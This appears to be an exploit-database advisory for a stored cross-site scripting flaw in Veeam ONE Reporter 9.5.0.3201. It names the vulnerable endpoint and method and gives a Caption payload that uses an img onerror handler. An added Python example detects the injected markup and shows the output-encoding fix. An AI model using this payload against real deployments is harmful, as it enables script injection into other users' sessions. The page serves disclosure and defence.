"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)"

Author: Seyed Sadegh Khatami

Platform: ashx

Release date: 2019-04-30

Release Date Title Type Platform Author
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)" webapps ashx "Seyed Sadegh Khatami"
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting" webapps ashx "Seyed Sadegh Khatami"
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery" webapps ashx "Seyed Sadegh Khatami"
2016-02-26 "Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities" webapps ashx LiquidWorm
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016


#exploit:

Path: /CommonDataHandlerReadOnly.ashx

Method: setDashboardWidget

Set the Caption field to "AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>"
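
Added example, not part of the original advisory and not Veeam's code: a defender-side check that shows why the Caption value above becomes markup when it is written into the page unencoded, and that HTML-encoding it at output time leaves it as text. The widget template and all function names are assumptions made for illustration; the real Veeam ONE Reporter markup is not shown on this page.

```python
import html
from html.parser import HTMLParser

# Caption value from the advisory above, reproduced unchanged.
CAPTION = "AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>"
# Hypothetical widget template (assumption): the product's real markup is not on the page.
TEMPLATE = '<div class="widget"><div class="caption">{caption}</div></div>'


class MarkupAudit(HTMLParser):
    """Collects every start tag and every on* event-handler attribute."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [(tag, name) for name, _ in attrs if name.startswith("on")]


def audit(rendered):
    parser = MarkupAudit()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.handlers


def render_unsafe(caption):
    # Vulnerable pattern: the stored value is concatenated into HTML as-is.
    return TEMPLATE.format(caption=caption)


def render_encoded(caption):
    # Hardened pattern: HTML-encode at output time so the value stays text.
    return TEMPLATE.format(caption=html.escape(caption, quote=True))


def caption_injects_markup(caption):
    """True if rendering the caption unencoded changes the element structure."""
    baseline_tags, _ = audit(render_unsafe(""))
    tags, handlers = audit(render_unsafe(caption))
    return tags != baseline_tags or bool(handlers)


if __name__ == "__main__":
    print(audit(render_unsafe(CAPTION)))   # extra img element with an onerror handler
    print(audit(render_encoded(CAPTION)))  # only the template's own two div elements
```

caption_injects_markup() can be run over captions already stored by the application to find widgets that need review, while render_encoded() shows the output-encoding fix that closes the issue for every caption.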